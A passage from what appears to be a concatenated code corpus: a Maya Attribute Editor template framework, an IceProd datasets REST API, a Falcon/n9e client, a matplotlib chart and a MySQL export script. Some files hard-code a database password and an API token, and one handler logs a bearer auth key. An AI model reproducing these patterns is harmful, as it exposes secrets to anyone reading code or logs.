    # Anchor the label to the AE text column and dock the swatch beside it.
    cmds.formLayout(
        'swatchDisplayForm',
        edit=True,
        af=[
            ('swatchLabel', "top", 0),
            ('swatchLabel', "bottom", 0),
            ('swatchDisplay', "top", 0),
            ('swatchDisplay', "bottom", 0)
        ],
        aof=[
            ('swatchLabel', "right", -gTextColumnWidthIndex)
        ],
        an=[
            ('swatchLabel', "left"),
            ('swatchDisplay', "right")
        ],
        ac=[
            ('swatchDisplay', "left", 5, 'swatchLabel')
        ]
    )
    swatchDisplayReplace(plugName)
#
def swatchDisplayReplace(plugName):
    """(Re)bind the existing swatch UI to the node owning *plugName*:
    point the display port at the node, refresh the size menu commands
    and update the label."""
    nodeAndAttrs = plugName.split(".")
    node = nodeAndAttrs[0]
    # Clicking the swatch forces a re-render of it.
    cmds.swatchDisplayPort(
        'swatchDisplay',
        edit=True,
        shadingNode=node,
        annotation='Refresh Swatch',
        pressCommand=lambda *args: mel.eval("updateFileNodeSwatch " + node)
    )
    cmds.popupMenu('swatchPopup', edit=True, button=3)
    # Size presets: 64 / 96 / 128 pixels.
    cmds.menuItem(
        'swatchSmall',
        edit=True,
        command=lambda *args: cmds.swatchDisplayPort('swatchDisplay', edit=True, wh=(64, 64), rs=64)
    )
    cmds.menuItem(
        'swatchMedium',
        edit=True,
        command=lambda *args: cmds.swatchDisplayPort('swatchDisplay', edit=True, wh=(96, 96), rs=96)
    )
    cmds.menuItem(
        'swatchLarge',
        edit=True,
        command=lambda *args: cmds.swatchDisplayPort('swatchDisplay', edit=True, wh=(128, 128), rs=128)
    )
    cmds.text('swatchLabel', edit=True, label=swatchLabel(node))
#
class baseMode(object):
    """Base class for template modes; proxies node information from the
    owning template object."""

    def __init__(self, template):
        self.template = template

    @property
    def nodeName(self):
        """Node instance currently shown in the editor."""
        return self.template.nodeName

    @property
    def attr(self):
        """Attribute currently being edited."""
        return self.template.attr

    def nodeType(self):
        # BUGFIX: the template's node type was computed but never returned
        # (this proxy always yielded None, unlike nodeAttr/nodeAttrExists).
        return self.template.nodeType()

    def nodeAttr(self, attr):
        """Return the 'node.attr' plug name for *attr*."""
        return self.template.nodeAttr(attr)

    def nodeAttrExists(self, attr):
        """True if *attr* exists on the current node."""
        return self.template.nodeAttrExists(attr)
#
class rootMode(baseMode):
    """Template mode used when the template drives the top-level
    ``cmds.editorTemplate`` layout for a node type."""

    def __init__(self, template):
        super(rootMode, self).__init__(template)
        self._attr = None
        self._nodeName = None
        self._type = self.template.nodeType()

    def _updateCallback(self, nodeAttr):
        # Re-run the template update for the node owning this attribute.
        self.template._doUpdate(nodeAttr.split('.')[0])

    def preSetup(self):
        # Hook a custom control onto 'message' purely to receive
        # new/replace callbacks when the AE loads a node.
        self.addCustom('message', self._updateCallback, self._updateCallback)

    def postSetup(self):
        pass

    def update(self):
        pass

    def addTemplate(self, attr, template):
        """Embed *template* under *attr*: root-mode templates are set up
        directly, others are attached as child templates."""
        if template._isRootMode():
            template._doSetup(self.nodeAttr(attr))
        else:
            self.addChildTemplate(attr, template)

    @staticmethod
    def addChildTemplate(attr, template):
        """Record the child template's actions, suppress its attributes in
        the parent layout, and register it as a callCustom on *attr*."""
        template._setToChildMode()
        template._record = True
        template.setup()
        # BUGFIX: the loop variable used to be named `attr`, clobbering the
        # `attr` parameter; the editorTemplate call below then registered
        # the callCustom on the last suppressed attribute instead.
        for recordedAttr in template._attributes:
            try:
                cmds.editorTemplate(suppress=recordedAttr)
            except RuntimeError:
                pass
        cmds.editorTemplate(
            aeCallback(template._doSetup),
            aeCallback(template._doUpdate),
            attr,
            callCustom=True
        )

    @staticmethod
    def addControl(attr, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False, enumeratedItem=None):
        """Add a standard editorTemplate control for *attr*."""
        if not label:
            label = prettify(attr)
        args = [attr]
        kwargs = {}
        if dynamic:
            kwargs['addDynamicControl'] = True
        else:
            kwargs['addControl'] = True
        if changeCommand:
            # Callables must be exposed to MEL before editorTemplate sees them.
            if hasattr(changeCommand, '__call__'):
                changeCommand = aeCallback(changeCommand)
            args.append(changeCommand)
        if label:
            kwargs['label'] = label
        if annotation:
            kwargs['annotation'] = annotation
        cmds.editorTemplate(*args, **kwargs)

    @staticmethod
    def suppress(attr):
        cmds.editorTemplate(suppress=attr)

    @staticmethod
    def addCustom(attr, newFunc, replaceFunc):
        """Register new/replace callbacks (wrapped for MEL if callable)."""
        if hasattr(newFunc, '__call__'):
            newFunc = aeCallback(newFunc)
        if hasattr(replaceFunc, '__call__'):
            replaceFunc = aeCallback(replaceFunc)
        args = (newFunc, replaceFunc, attr)
        cmds.editorTemplate(callCustom=1, *args)

    @staticmethod
    def addSeparator():
        cmds.editorTemplate(addSeparator=True)

    @staticmethod
    def dimControl(nodeName, control, state):
        cmds.editorTemplate(dimControl=(nodeName, control, state))

    @staticmethod
    def beginLayout(name, collapse=True):
        cmds.editorTemplate(beginLayout=name, collapse=collapse)

    @staticmethod
    def endLayout():
        cmds.editorTemplate(endLayout=True)

    @staticmethod
    def beginScrollLayout():
        cmds.editorTemplate(beginScrollLayout=True)

    @staticmethod
    def endScrollLayout():
        cmds.editorTemplate(endScrollLayout=True)

    @staticmethod
    def beginNoOptimize():
        cmds.editorTemplate(beginNoOptimize=True)

    @staticmethod
    def endNoOptimize():
        cmds.editorTemplate(endNoOptimize=True)

    @staticmethod
    def interruptOptimize():
        cmds.editorTemplate(interruptOptimize=True)

    @staticmethod
    def addComponents():
        cmds.editorTemplate(addComponents=True)

    @staticmethod
    def addExtraControls(label=None):
        kwargs = {}
        if label:
            kwargs['extraControlsLabel'] = label
        cmds.editorTemplate(addExtraControls=True, **kwargs)
#
class AttrControlGrp(object):
    """Factory wrapper that chooses the appropriate attr*Grp UI command for
    an attribute based on its Maya type.

    (Python 2 module: note the ``print`` statement below.)
    """
    # Maps Maya attribute type -> UI command used to build the control.
    uiTypeDic = {
        'float': cmds.attrFieldSliderGrp,
        'float2': cmds.attrFieldGrp,
        'float3': cmds.attrFieldGrp,
        'color': cmds.attrColorSliderGrp,
        'bool': cmds.attrControlGrp,
        'long': cmds.attrFieldSliderGrp,
        'byte': cmds.attrFieldSliderGrp,
        'long2': cmds.attrFieldGrp,
        'long3': cmds.attrFieldGrp,
        'short': cmds.attrFieldSliderGrp,
        'short2': cmds.attrFieldGrp,
        'short3': cmds.attrFieldGrp,
        'enum': cmds.attrEnumOptionMenuGrp,
        'double': cmds.attrFieldSliderGrp,
        'double2': cmds.attrFieldGrp,
        'double3': cmds.attrFieldGrp,
        'string': attrTextFieldGrp,
        'message': cmds.attrNavigationControlGrp
    }

    def __init__(self, attribute, *args, **kwargs):
        """Create the control for *attribute* ('node.attr').

        Kwargs:
            type / typ: explicit attribute type; queried from Maya if absent.
            changeCommand: change callback; for color/enum/message controls
                it is wired up via a scriptJob instead of the command flag.
        """
        self.attribute = attribute
        self.type = kwargs.pop('type', kwargs.pop('typ', None))
        if not self.type:
            self.type = attrType(self.attribute)
        # These control types do not take changeCommand directly; keep the
        # callback and attach it with a scriptJob after creation.
        if self.type in ['color', 'enum', 'message']:
            self.callback = kwargs.pop('changeCommand', None)
        else:
            self.callback = None
        kwargs['attribute'] = self.attribute
        # Unknown types get no control at all (self.control is never set).
        if self.type not in self.uiTypeDic:
            return
        cmd = self.uiTypeDic[self.type]
        try:
            self.control = cmd(*args, **kwargs)
        except RuntimeError:
            print "Error creating %s:" % cmd.__name__
            raise
        if self.callback:
            cmds.scriptJob(
                attributeChange=[self.attribute, self.callback],
                replacePrevious=True,
                parent=self.control
            )

    def edit(self, **kwargs):
        """Forward an edit-mode call to the underlying control command."""
        kwargs['edit'] = True
        if self.type not in self.uiTypeDic:
            return
        self.uiTypeDic[self.type](self.control, **kwargs)

    def setAttribute(self, attribute):
        """Rebind the existing control (and callback scriptJob) to a new
        attribute plug."""
        self.attribute = attribute
        if self.type not in self.uiTypeDic:
            return
        self.uiTypeDic[self.type](self.control, edit=True, attribute=self.attribute)
        if self.callback:
            cmds.scriptJob(
                attributeChange=[self.attribute, self.callback],
                replacePrevious=True,
                parent=self.control
            )
#
class childMode(baseMode):
    """Template mode used when the template builds real UI controls inside
    a parent layout (as opposed to driving editorTemplate directly)."""

    def __init__(self, template):
        super(childMode, self).__init__(template)
        # (attr, updateFunc, parentLayout) triples, replayed by update().
        self._controls = []
        self._layoutStack = []

    def preSetup(self):
        cmds.setUITemplate('attributeEditorTemplate', pushTemplate=True)
        self._layoutStack = [cmds.setParent(query=True)]

    @staticmethod
    def postSetup():
        cmds.setUITemplate(popTemplate=True)

    def update(self):
        """Re-point every created control at the current node's plugs."""
        cmds.setUITemplate('attributeEditorTemplate', pushTemplate=True)
        try:
            for attr, updateFunc, parent in self._controls:
                cmds.setParent(parent)
                updateFunc(self.nodeAttr(attr))
        except:
            # Bare except is deliberate: report which attribute failed,
            # then re-raise unchanged.
            print("Template %r Failed to Update Attribute '%s'" % (self.template, self.attr))
            raise
        finally:
            cmds.setUITemplate(popTemplate=True)

    def addTemplate(self, attr, template):
        self.addChildTemplate(attr, template)

    def addChildTemplate(self, attr, template):
        """Record the child template's actions, suppress its attributes and
        attach it as a custom control on *attr*."""
        template._setToChildMode()
        template._record = True
        template.setup()
        # BUGFIX: the loop variable used to be named `attr`, clobbering the
        # `attr` parameter; addCustom below then attached the template to
        # the last suppressed attribute instead of the requested one.
        for recordedAttr in template._attributes:
            try:
                cmds.editorTemplate(suppress=recordedAttr)
            except RuntimeError:
                pass
        self.addCustom(attr, template._doSetup, template._doUpdate)

    def addControl(self, attr, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False, enumeratedItem=None):
        """Create an AttrControlGrp for *attr* under the current layout."""
        if not label:
            label = prettify(attr)
        kwargs = {'label': label, 'attribute': self.nodeAttr(attr)}
        if annotation:
            kwargs['annotation'] = annotation
        if changeCommand:
            kwargs['changeCommand'] = changeCommand
        if enumeratedItem:
            kwargs['enumeratedItem'] = enumeratedItem
        parent = self._layoutStack[-1]
        cmds.setParent(parent)
        control = AttrControlGrp(**kwargs)
        self._controls.append((attr, control.setAttribute, parent))

    def addCustom(self, attr, createFunc, updateFunc):
        """Run *createFunc* inside a fresh columnLayout and register
        *updateFunc* for later updates."""
        parent = self._layoutStack[-1]
        cmds.setParent(parent)
        col = cmds.columnLayout(adj=True)
        createFunc(self.nodeAttr(attr))
        cmds.setParent(parent)
        self._controls.append((attr, updateFunc, col))

    @staticmethod
    def addSeparator():
        cmds.separator()

    def beginLayout(self, label, **kwargs):
        kwargs['label'] = label
        cmds.setParent(self._layoutStack[-1])
        cmds.frameLayout(**kwargs)
        self._layoutStack.append(cmds.columnLayout(adjustableColumn=True))

    def endLayout(self):
        self._layoutStack.pop()
        cmds.setParent(self._layoutStack[-1])

    # The remaining editorTemplate concepts have no child-mode equivalent.
    def beginNoOptimize(self):
        pass

    def endNoOptimize(self):
        pass

    def beginScrollLayout(self):
        pass

    def endScrollLayout(self):
        pass

    def addExtraControls(self):
        pass
#
class baseTemplate(object):
    """Shared state for AE templates: the node type, the node currently
    shown in the editor and the attribute being edited."""

    def __init__(self, nodeType):
        self._type = nodeType
        self._nodeName = None
        self._attr = None

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self._type)

    @property
    def nodeName(self):
        """Node instance currently loaded in the editor."""
        return self._nodeName

    @property
    def attr(self):
        """Attribute name currently being edited."""
        return self._attr

    def nodeType(self):
        """Node type; resolved lazily from the current node when it was
        not supplied at construction time."""
        if self._type is None:
            self._type = cmds.objectType(self.nodeName)
        return self._type

    def nodeAttr(self, attr=None):
        """Return 'node.attr' for *attr* (defaults to the current attr)."""
        chosen = self.attr if attr is None else attr
        return self.nodeName + '.' + chosen

    def nodeAttrExists(self, attr):
        """True if the attribute exists on the current node."""
        return cmds.addAttr(self.nodeAttr(attr), q=1, ex=1)
#
class attributeTemplate(baseTemplate):
    """User-facing AE template.  Starts in root mode (driving
    editorTemplate); switches to child mode when embedded in another
    template.  Public UI methods are dispatched to the active mode via
    the modeMethod/modeAttrMethod decorators."""
    # When True, snake_case attribute names are converted to Maya-style
    # camelCase by modeAttrMethod before use.
    convertToMayaStyle = False

    def __init__(self, nodeType):
        super(attributeTemplate, self).__init__(nodeType)
        self._rootMode = rootMode(self)
        self._childMode = childMode(self)
        self._mode = self._rootMode
        # Recorded (func, args, kwargs) actions, replayed in _doSetup.
        self._actions = []
        # Every attribute touched by the template (used for suppression).
        self._attributes = []
        self._record = False

    def _setToRootMode(self):
        self._mode = self._rootMode

    def _isRootMode(self):
        return self._mode == self._rootMode

    def _setToChildMode(self):
        self._mode = self._childMode

    def _isChildMode(self):
        return self._mode == self._childMode

    def _setActiveNodeAttr(self, nodeName):
        # Accepts either 'node' or 'node.attr'.
        parts = nodeName.split('.', 1)
        self._nodeName = parts[0]
        if len(parts) > 1:
            self._attr = parts[1]

    def _doSetup(self, nodeAttr):
        # Build the UI: replay recorded actions, or run setup() fresh.
        self._setActiveNodeAttr(nodeAttr)
        self._mode.preSetup()
        if self._record:
            for func, args, kwargs in self._actions:
                func(*args, **kwargs)
        else:
            self.setup()
        self._mode.postSetup()

    def _doUpdate(self, nodeAttr):
        self._setActiveNodeAttr(nodeAttr)
        self._mode.update()

    # The decorated methods below are dispatched to the active mode object
    # (rootMode/childMode); their bodies here are placeholders.
    @modeMethod
    def update(self):
        pass

    @modeAttrMethod
    def addTemplate(self, attr, template):
        pass

    @modeAttrMethod
    def addChildTemplate(self, attr, template):
        pass

    @modeAttrMethod
    def addControl(self, attr, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False, enumeratedItem=None):
        pass

    @modeMethod
    def suppress(self, attr):
        pass

    @modeMethod
    def addSeparator(self):
        pass

    @modeAttrMethod
    def addCustom(self, attr, createFunc, updateFunc):
        pass

    @modeMethod
    def beginLayout(self, label, **kwargs):
        pass

    @modeMethod
    def endLayout(self):
        pass

    @modeMethod
    def beginNoOptimize(self):
        pass

    @modeMethod
    def endNoOptimize(self):
        pass

    @modeMethod
    def beginScrollLayout(self):
        pass

    @modeMethod
    def endScrollLayout(self):
        pass

    @modeMethod
    def addExtraControls(self):
        pass

    def addSwatch(self):
        # The render swatch hangs off the node's 'message' attribute.
        self.addCustom("message", swatchDisplayNew, swatchDisplayReplace)

    # For Override: subclasses implement their UI layout here.
    def setup(self):
        pass
| 20,731 | 6,266 |
from .bubbleio import BubbleIo
| 31 | 12 |
import pandas as pd
def dump(df: pd.DataFrame) -> bytes:
    """Serialize *df* to bytes.

    NOTE(review): not implemented — the body is a stub and currently
    returns None, violating the declared ``bytes`` return type.  TODO:
    implement the intended serialization.
    """
    pass
| 68 | 24 |
import logging
import json
import uuid
from collections import defaultdict
import tornado.web
import tornado.httpclient
from tornado.platform.asyncio import to_asyncio_future
import pymongo
import motor
from rest_tools.client import RestClient
from iceprod.server.rest import RESTHandler, RESTHandlerSetup, authorization
from iceprod.server.util import nowstr, dataset_statuses, dataset_status_sort
# Module-level logger for the datasets REST API.
logger = logging.getLogger('rest.datasets')
def setup(config, *args, **kwargs):
    """
    Setup method for Dataset REST API.

    Sets up any database connections or other prerequisites.

    Args:
        config (dict): an instance of :py:class:`iceprod.server.config`.

    Returns:
        list: Routes for dataset, which can be passed to :py:class:`tornado.web.Application`.
    """
    rest_cfg = config.get('rest', {}).get('datasets', {})
    db_cfg = rest_cfg.get('database', {})

    # Ensure the unique index on dataset_id exists (a blocking pymongo
    # client is fine here: setup runs once at startup).
    sync_db = pymongo.MongoClient(**db_cfg).datasets
    if 'dataset_id_index' not in sync_db.datasets.index_information():
        sync_db.datasets.create_index('dataset_id', name='dataset_id_index', unique=True)

    handler_cfg = RESTHandlerSetup(config, *args, **kwargs)
    # Handlers get the async (motor) client.
    handler_cfg['database'] = motor.motor_tornado.MotorClient(**db_cfg).datasets

    return [
        (r'/datasets', MultiDatasetHandler, handler_cfg),
        (r'/datasets/(?P<dataset_id>\w+)', DatasetHandler, handler_cfg),
        (r'/datasets/(?P<dataset_id>\w+)/description', DatasetDescriptionHandler, handler_cfg),
        (r'/datasets/(?P<dataset_id>\w+)/status', DatasetStatusHandler, handler_cfg),
        (r'/datasets/(?P<dataset_id>\w+)/priority', DatasetPriorityHandler, handler_cfg),
        (r'/datasets/(?P<dataset_id>\w+)/jobs_submitted', DatasetJobsSubmittedHandler, handler_cfg),
        (r'/dataset_summaries/status', DatasetSummariesStatusHandler, handler_cfg),
    ]
class BaseHandler(RESTHandler):
    """
    Base handler for Dataset REST API.

    Stores the async database handle on ``self.db``.
    """
    def initialize(self, database=None, **kwargs):
        super().initialize(**kwargs)
        self.db = database
class MultiDatasetHandler(BaseHandler):
    """
    Handle multi-group requests.
    """
    @authorization(roles=['admin','client','system','user']) #TODO: figure out how to do auth for each dataset in the list
    async def get(self):
        """
        Get a dict of datasets.

        Params (optional):
            status: | separated list of status filters
            groups: | separated list of groups to filter on
            users: | separated list of users to filter on
            keys: | separated list of keys to return for each dataset

        Returns:
            dict: {<dataset_id>: metadata}
        """
        # Build the mongo query from the optional '|'-separated filters.
        query = {}
        status = self.get_argument('status', None)
        if status:
            query['status'] = {'$in': status.split('|')}
        groups = self.get_argument('groups', None)
        if groups:
            query['group'] = {'$in': groups.split('|')}
        users = self.get_argument('users', None)
        if users:
            query['username'] = {'$in': users.split('|')}
        # Never return mongo's _id; optionally restrict to requested keys.
        projection = {'_id': False}
        keys = self.get_argument('keys', None)
        if keys:
            projection.update({x:True for x in keys.split('|') if x})
        ret = {}
        async for row in self.db.datasets.find(query, projection=projection):
            k = row['dataset_id']
            ret[k] = row
        self.write(ret)
        self.finish()

    @authorization(roles=['admin','user']) # anyone should be able to create a dataset
    async def post(self):
        """
        Add a dataset.

        Body should contain all necessary fields for a dataset.
        """
        data = json.loads(self.request.body)
        # validate first
        req_fields = {
            'description': str,
            'jobs_submitted': int,
            'tasks_submitted': int,
            'tasks_per_job': int,
            'group': str,
        }
        for k in req_fields:
            if k not in data:
                raise tornado.web.HTTPError(400, reason='missing key: '+k)
            if not isinstance(data[k], req_fields[k]):
                r = 'key "{}" should be of type {}'.format(k, req_fields[k].__name__)
                raise tornado.web.HTTPError(400, reason=r)
        opt_fields = {
            'priority': int,
            'debug': bool,
            'jobs_immutable': bool,
            'status': str,
        }
        for k in opt_fields:
            if k in data and not isinstance(data[k], opt_fields[k]):
                r = 'key "{}" should be of type {}'.format(k, opt_fields[k].__name__)
                raise tornado.web.HTTPError(400, reason=r)
        # Reject any keys outside the required + optional sets.
        bad_fields = set(data).difference(set(opt_fields).union(req_fields))
        if bad_fields:
            r = 'invalid keys found'
            raise tornado.web.HTTPError(400, reason=r)
        if data['jobs_submitted'] == 0 and data['tasks_per_job'] <= 0:
            r = '"tasks_per_job" must be > 0'
            raise tornado.web.HTTPError(400, reason=r)
        # NOTE(review): if jobs_submitted == 0 (with tasks_per_job > 0) and
        # tasks_submitted != 0, this division raises ZeroDivisionError
        # (HTTP 500) rather than a 400 — confirm intended input constraints.
        elif data['tasks_submitted'] != 0 and data['tasks_submitted'] / data['jobs_submitted'] != data['tasks_per_job']:
            r = '"tasks_per_job" does not match "tasks_submitted"/"jobs_submitted"'
            raise tornado.web.HTTPError(400, reason=r)
        # generate dataset number via an atomic counter in `settings`
        ret = await self.db.settings.find_one_and_update(
            {'name': 'dataset_num'},
            {'$inc': {'num': 1}},
            projection={'num': True, '_id': False},
            upsert=True,
            return_document=pymongo.ReturnDocument.AFTER)
        dataset_num = ret['num']
        # set some fields
        data['dataset_id'] = uuid.uuid1().hex
        data['dataset'] = dataset_num
        if 'status' not in data:
            data['status'] = 'processing'
        data['start_date'] = nowstr()
        data['username'] = self.auth_data['username']
        if 'priority' not in data:
            data['priority'] = 0.5
        if 'debug' not in data:
            data['debug'] = False
        if 'jobs_immutable' not in data:
            data['jobs_immutable'] = False
        # insert
        ret = await self.db.datasets.insert_one(data)
        # set auth rules for the new dataset on the auth service
        url = '/auths/'+data['dataset_id']
        http_client = RestClient(self.auth_url, token=self.module_auth_key)
        auth_data = {
            'read_groups':['admin',data['group'],'users'],
            'write_groups':['admin',data['group']],
        }
        logger.info('Authorization header: %s', 'bearer '+self.module_auth_key)
        await http_client.request('PUT', url, auth_data)
        # return success
        self.set_status(201)
        self.set_header('Location', '/datasets/'+data['dataset_id'])
        self.write({'result': '/datasets/'+data['dataset_id']})
        self.finish()
class DatasetHandler(BaseHandler):
    """
    Handle single-dataset requests.
    """
    @authorization(roles=['admin','client','system','pilot'], attrs=['dataset_id:read'])
    async def get(self, dataset_id):
        """
        Get a dataset.

        Args:
            dataset_id (str): the dataset

        Returns:
            dict: dataset metadata
        """
        dataset = await self.db.datasets.find_one(
            {'dataset_id': dataset_id}, projection={'_id': False})
        if dataset:
            self.write(dataset)
            self.finish()
        else:
            self.send_error(404, reason="Dataset not found")
class DatasetDescriptionHandler(BaseHandler):
    """
    Handle dataset description updates.
    """
    @authorization(roles=['admin'], attrs=['dataset_id:write'])
    async def put(self, dataset_id):
        """
        Set a dataset description.

        Args:
            dataset_id (str): the dataset

        Returns:
            dict: empty dict
        """
        payload = json.loads(self.request.body)
        if 'description' not in payload:
            raise tornado.web.HTTPError(400, reason='missing description')
        if not isinstance(payload['description'], str):
            raise tornado.web.HTTPError(400, reason='bad description')
        updated = await self.db.datasets.find_one_and_update(
            {'dataset_id': dataset_id},
            {'$set': {'description': payload['description']}},
            projection=['_id'])
        if not updated:
            self.send_error(404, reason="Dataset not found")
        else:
            self.write({})
            self.finish()
class DatasetStatusHandler(BaseHandler):
    """
    Handle dataset status updates.
    """
    @authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
    async def put(self, dataset_id):
        """
        Set a dataset status.

        Args:
            dataset_id (str): the dataset

        Returns:
            dict: empty dict
        """
        payload = json.loads(self.request.body)
        if 'status' not in payload:
            raise tornado.web.HTTPError(400, reason='missing status')
        if payload['status'] not in dataset_statuses:
            raise tornado.web.HTTPError(400, reason='bad status')
        updated = await self.db.datasets.find_one_and_update(
            {'dataset_id': dataset_id},
            {'$set': {'status': payload['status']}},
            projection=['_id'])
        if not updated:
            self.send_error(404, reason="Dataset not found")
        else:
            self.write({})
            self.finish()
class DatasetPriorityHandler(BaseHandler):
    """
    Handle dataset priority updates.
    """
    @authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
    async def put(self, dataset_id):
        """
        Set a dataset priority.

        Args:
            dataset_id (str): the dataset

        Returns:
            dict: empty dict
        """
        payload = json.loads(self.request.body)
        if 'priority' not in payload:
            raise tornado.web.HTTPError(400, reason='missing priority')
        if not isinstance(payload['priority'], (int, float)):
            raise tornado.web.HTTPError(400, reason='priority is not a number')
        updated = await self.db.datasets.find_one_and_update(
            {'dataset_id': dataset_id},
            {'$set': {'priority': payload['priority']}},
            projection=['_id'])
        if not updated:
            self.send_error(404, reason="Dataset not found")
        else:
            self.write({})
            self.finish()
class DatasetJobsSubmittedHandler(BaseHandler):
    """
    Handle dataset jobs_submitted updates.
    """
    @authorization(roles=['admin'], attrs=['dataset_id:write'])
    async def put(self, dataset_id):
        """
        Set a dataset's jobs_submitted.

        Only allows increases, if the jobs_immutable flag is not set.

        Args:
            dataset_id (str): the dataset

        Json body:
            jobs_submitted (int): the number of jobs submitted

        Returns:
            dict: empty dict
        """
        data = json.loads(self.request.body)
        if 'jobs_submitted' not in data:
            raise tornado.web.HTTPError(400, reason='missing jobs_submitted')
        try:
            jobs_submitted = int(data['jobs_submitted'])
        except Exception:
            raise tornado.web.HTTPError(400, reason='jobs_submitted is not an int')
        # Fetch the current document to validate against.
        # NOTE(review): this read-then-update is not atomic; concurrent PUTs
        # could race between the checks below and the update.
        ret = await self.db.datasets.find_one({'dataset_id':dataset_id})
        if not ret:
            raise tornado.web.HTTPError(404, reason='Dataset not found')
        if ret['jobs_immutable']:
            raise tornado.web.HTTPError(400, reason='jobs_submitted is immutable')
        if ret['jobs_submitted'] > jobs_submitted:
            raise tornado.web.HTTPError(400, reason='jobs_submitted must be larger than before')
        if 'tasks_per_job' not in ret or ret['tasks_per_job'] <= 0:
            raise tornado.web.HTTPError(400, reason='tasks_per_job not valid')
        # Keep tasks_submitted consistent with the new job count.
        ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
                {'$set':{
                    'jobs_submitted': jobs_submitted,
                    'tasks_submitted': int(jobs_submitted*ret['tasks_per_job']),
                }},
                projection=['_id'])
        if not ret:
            self.send_error(404, reason="Dataset not found")
        else:
            self.write({})
            self.finish()
class DatasetSummariesStatusHandler(BaseHandler):
    """
    Handle dataset summary grouping by status.
    """
    @authorization(roles=['admin','system','client','user']) #TODO: figure out how to do auth for each dataset in the list
    async def get(self):
        """
        Get the dataset summary for all datasets, group by status.

        Returns:
            dict: {<status>: [<dataset_id>,]}
        """
        buckets = defaultdict(list)
        cursor = self.db.datasets.find(
            projection={'_id': False, 'status': True, 'dataset_id': True})
        async for doc in cursor:
            buckets[doc['status']].append(doc['dataset_id'])
        # Emit the statuses in canonical sort order.
        ordered = {s: buckets[s] for s in sorted(buckets, key=dataset_status_sort)}
        self.write(ordered)
        self.finish()
| 13,152 | 3,924 |
# -*- coding: utf-8 -*-
# author: itimor
import requests
import json
# Python 2/3 compatibility import.
# NOTE(review): `urlencode` is never used in this module — candidate for removal.
try:
    from urllib.parse import urlencode
except ImportError:
    from urllib import urlencode
class FalconClient(object):
    """Chained REST client for an n9e/Open-Falcon style API.

    Attribute access builds URL path segments (underscores become dashes);
    the final attribute before the call names the HTTP method, e.g.
    ``cli.node['2'].endpoint_unbind.post(data=...)``.
    """

    def __init__(self, endpoint=None, user=None, token=None, keys=None, session=None, ssl_verify=True):
        """Create a client; when no *session* is given, log in with
        *user*/*token* and install the resulting auth headers.

        Args:
            endpoint: base URL of the API.
            user: login name (only used when creating a new session).
            token: password/token (only used when creating a new session).
            keys: accumulated URL path segments (internal, for chaining).
            session: existing requests.Session to reuse.
            ssl_verify: passed through to requests' ``verify``.
        """
        self._endpoint = endpoint
        self._job_prex = 'job/'
        self._url_suffix = 'api/json'
        # BUGFIX: `keys` previously used a mutable default argument ([]).
        self._keys = keys if keys is not None else []
        self._session = session
        self.ssl_verify = ssl_verify
        if not session:
            params = {
                "name": user,
                "password": token
            }
            self._session = requests.Session()
            ret = self.do_request('get', '/', params=params)
            print(ret)
            api_token = {
                "name": user,
                "sig": ret.get("sig")
            }
            self._session.auth = (user, token)
            self._session.headers.update({
                'Content-Type': 'application/json; charset=utf-8',
                'Accept': 'application/json',
                'Apitoken': json.dumps(api_token)
            })

    def __getattr__(self, key):
        """Extend the URL path chain with *key*, returning a new client
        that shares this one's endpoint and session."""
        if key in self.__dict__:
            return self.__dict__[key]
        return self.__class__(
            endpoint=self._endpoint,
            keys=self._keys + [key],
            session=self._session,
            ssl_verify=self.ssl_verify)

    def __getitem__(self, key):
        """Look up an option value and perform string substitution."""
        return self.__getattr__(key)

    def __call__(self, **kwargs):
        """Execute the chain: last segment is the HTTP method, the rest
        form the URL (underscores mapped to dashes)."""
        method = self._keys[-1]
        url = "/".join(self._keys[0:-1])
        url = url.replace("_", "-")
        return self.do_request(method, url, **kwargs)

    def do_request(self, method, url, params=None, data=None):
        """Issue an HTTP request and return the decoded JSON body (or an
        error string when the body is not JSON).

        Raises:
            ValueError: when *method* is not a supported verb.
        """
        url = self._endpoint + url + self._url_suffix
        if data:
            print(data)
        if params is None:
            params = {}
        if method == 'get' or method == 'list':
            response = self._session.get(url, params=params, verify=self.ssl_verify)
        elif method == 'post' or method == 'create':
            response = self._session.post(url, params=params, json=data, verify=self.ssl_verify)
        elif method == 'put' or method == 'update':
            response = self._session.put(url, json=data, verify=self.ssl_verify)
        elif method == 'delete':
            response = self._session.delete(url, params=params, json=data, verify=self.ssl_verify)
        else:
            # BUGFIX: an unknown verb previously fell through and raised
            # UnboundLocalError on `response`; fail with a clear error.
            raise ValueError('unsupported HTTP method: %s' % method)
        try:
            body = json.loads(response.text)
        except ValueError:
            body = "Get unknow error is [%s]" % response.reason
        return body
# Example usage: performs live HTTP calls against an n9e server.
# NOTE(review): credentials are hard-coded in source — move to config/env.
if __name__ == '__main__':
    cli = FalconClient(endpoint="http://n9e.xxoo.com", user='admin', token='11871bd159bd19da9ab624d161c569e3c8')
    params = {"idents": ["192.168.0.112"]}
    # POSTs to .../node/2/endpoint-unbind (underscores map to dashes).
    r = cli.node['2'].endpoint_unbind.post(data=params)
    print(r)
| 2,938 | 886 |
import matplotlib.pyplot

# Plot first-semester 2017 revenue per month and save it as an image.
plt = matplotlib.pyplot

month_names = ['Janeiro', 'Fevereiro', 'Marco', 'Abril', 'Maio', 'Junho']
revenue = [105235, 107697, 110256, 109236, 108859, 109986]

plt.plot(month_names, revenue)
plt.title('Faturamento no primeiro semestre de 2017')
plt.xlabel('Meses')
plt.ylabel('Faturamento em R$')
# Save before show(): show() can clear the current figure.
plt.savefig('grafico.png', dpi=100)
plt.show()
| 411 | 189 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import mysql.connector

# Connect to the local MySQL database and export all GND identifiers
# from the professor catalogue as a single '|'-separated string.
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    passwd="schleichkatze",  # NOTE(review): hard-coded credential in source control
    database="helmstedt"
)
mycursor = mydb.cursor()
mycursor.execute("SELECT id, gnd FROM helmstedt.temp_prof_kat")
myresult = mycursor.fetchall()
# Keep only rows that actually have a GND id (idiomatic None check).
gnds = [x[1] for x in myresult if x[1] is not None]
print('|'.join(gnds))
"""
# Eine Liste (geordnet, indexiert und veränderlich)
mylist = ['Lerche', 'Schneider', 'Zimmermann', 'Kästner', 'Raabe', 'Schmidt-Glintzer', 'bURSCHEL']
